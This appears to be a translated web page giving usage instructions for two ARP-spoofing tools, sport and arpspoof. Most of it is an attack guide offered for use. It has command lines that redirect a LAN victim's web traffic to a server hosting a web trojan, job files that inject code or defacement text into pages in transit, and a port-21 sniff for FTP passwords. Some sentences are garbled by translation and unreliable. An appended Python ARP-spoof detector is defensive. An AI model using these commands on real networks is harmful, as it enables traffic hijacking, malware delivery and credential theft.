ARP spoofing-based port hijacking tool (sport) and session modification tool (arspoof)

Source: Internet
Author: User


First: sport.exe

Applicable environment: LAN + switch
Sport.exe (VC++ 6.0 & WinPcap 3.1 & UPX release) 17kb

ARP portspoof ver 1.0 by cooldiyer
Usage:
Sport <Target> <IP1> <Port> <IP2> <Port> <adpnum>
Sport /L

Sport /L lists the NICs.

Assume that the IP address of Baidu.com is 220.181.18.114, the IP address to be spoofed is 192.168.0.12, and the NIC ID is 2.
To forward data to another website when 192.168.0.12 accesses Baidu, here port 81 of 202.107.5.23 (where your web trojan is configured), with NIC ID 2, run the following command:

Sport 192.168.0.12 220.181.18.114 80 202.107.5.23 81 2

From then on, when 192.168.0.12 accesses Baidu, the data it receives is whatever port 81 of 202.107.5.23 returns.

You can also redirect to another host on the LAN, such as:

Sport 192.168.0.12 220.181.18.114 80 192.168.0.100 8080 2

You can also redirect to yourself. Assume that your IP address is 192.168.0.18 and that you run a web server on port 81.

Sport 192.168.0.12 220.181.18.114 80 192.168.0.18 81 2

When 192.168.0.12 accesses Baidu, the page from your web server is displayed.

Because of a limitation in the program, Target, that is, the spoofed host, must be in the same network segment as you.
The gateway also cannot be spoofed (because the danger is too high, the program leaves out that part of the code).

These functions can be used for intranet penetration; combined with social engineering, they can do a lot of unexpected things.
__________________________

Second: arpspoof.exe

Applicable environment: LAN + switch
Sport.exe (VC++ 6.0 & WinPcap 3.1 & UPX release) 19.5kb

Arpspoof ver 3.1 By cooldiyer
Usage:
Arpspoof <IP1> <IP2> <Port> <adpnum> <Mode> <jobfile>
Arpspoof /L
Mode options:
0 IP1 --> IP2
1 IP1 <-> IP2
Examples:
> arpspoof 192.168.0.1 192.168.0.8 80 2 1 job.txt
# Spoof 192.168.0.1 <-> 192.168.0.8

> arpspoof 192.168.0.1 192.168.0.8 80 2 0 /Reset
# Reset 192.168.0.1 --> 192.168.0.8

> arpspoof /L
# Lists adapters

> arpspoof /n
# Release a new replace job file

The program modifies data packets in transit while ARP spoofing and inserts malicious code into them (it also works on public networks).

Arpspoof /L lists the NIC IDs.

Note that the content of the jobfile has the following format (you can use arpspoof /n to create a job file):

----
<hea
----
Hack by cooldiyer<noframes>
----
<hea
----
Hack by cooldiyer<noframes>

This means replacing "<hea" with "Hack by cooldiyer<noframes>", so the web page displays only
"Hack by cooldiyer", because the <noframes> tag hides all the markup after it. This is a good trick.
The program treats "----" as a separator. After the first separator comes the old string to be replaced, and after the second comes the new string that replaces it. Line breaks are not allowed.
Likewise, after the third separator comes the next old string, and after the fourth the next new string. Pairs can be added without limit, but the fewer the better,
because the program cannot cope with too many.

The following describes attack instances.

1: Internet attack instance

For example, suppose the Baidu host is 220.181.18.114, you have the highest permission on some host, for example 220.181.18.9, and the gateway is 220.181.18.1.
You can check whether the network card ID is. You can change the number of data destined for the Network to. job.txt is generated using arpspoof/n. The command is as follows:
Arpspoof 220.181.18.1 220.181.18.114 80 2 0 job.txt
In this way, when others access Baidu, they will only see one line of "hack by cooldiyer". Of course, you can also change other data for other purposes.

2: Intranet attack instance
Similarly, suppose you want 192.168.0.100 to see a hacked page when it accesses Baidu, and the gateway is 192.168.0.1. Execute the following command:
Arpspoof 192.168.0.1 192.168.0.100 80 2 0 job.txt
When it visits Baidu, it will see the hacked page. Of course, you can also rewrite it into other code.

3: Data sniffing. Haha, a basic function. If no job file follows the parameters, the program displays the data on the specified port, for example when sniffing an FTP password.

Arpspoof 202.103.248.1 202.103.248.100 21 2 1

The program will automatically display the data of port 21 that has been sniffed.
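
Both tools depend on forged ARP replies, and those leave two symptoms a defender can watch for on the LAN: an IP address whose MAC suddenly changes, and one MAC answering for several IPs. The detector below is an added example, not part of the original post or of cooldiyer's tools; the function names, MAC addresses and sample capture are constructed for illustration, with IP addresses taken from the intranet examples above.

```python
import struct
from collections import defaultdict

def _mac(b): return ":".join(f"{x:02x}" for x in b)
def _ip(b): return ".".join(map(str, b))

def parse_arp(frame):
    """Return (sender_mac, sender_ip) from an Ethernet/IPv4 ARP frame, or None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":      # EtherType must be ARP
        return None
    htype, ptype, hlen, plen, _op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):     # Ethernet + IPv4 only
        return None
    return _mac(frame[22:28]), _ip(frame[28:32])

def detect(frames):
    """Flag an IP whose MAC changes and a MAC that claims more than one IP."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[1] == "0.0.0.0":        # skip non-ARP and ARP probes
            continue
        mac, ip = parsed
        known = ip_to_mac.setdefault(ip, mac)               # first binding seen is the baseline
        if known != mac:
            alerts.append(("ip-changed-mac", ip, known, mac))
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(("mac-claims-ips", mac, sorted(mac_to_ips[mac])))
    return alerts

def sample_frame(op, smac, sip, tmac, tip):
    """Build a constructed ARP frame in memory (test input only; nothing is sent)."""
    h = lambda m: bytes.fromhex(m.replace(":", ""))
    a = lambda i: bytes(map(int, i.split(".")))
    return (h(tmac) + h(smac) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + h(smac) + a(sip) + h(tmac) + a(tip))

# Constructed capture: MACs are made up; IPs follow the page's intranet example.
GW, HOST, OTHER = "00:11:22:33:44:01", "00:11:22:33:44:64", "00:11:22:33:44:12"
SAMPLE = [
    sample_frame(2, GW, "192.168.0.1", HOST, "192.168.0.100"),     # gateway's real reply
    sample_frame(1, OTHER, "192.168.0.18", "ff:ff:ff:ff:ff:ff", "192.168.0.100"),
    sample_frame(2, OTHER, "192.168.0.1", HOST, "192.168.0.100"),  # gateway IP, other MAC
    b"\x00" * 60,                                                   # non-ARP noise
]

if __name__ == "__main__":
    print(*detect(SAMPLE), sep="\n")
```

In practice the frames would come from a capture on a monitoring port. Static ARP entries for the gateway, or Dynamic ARP Inspection on the switch, prevent the poisoning itself.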

 
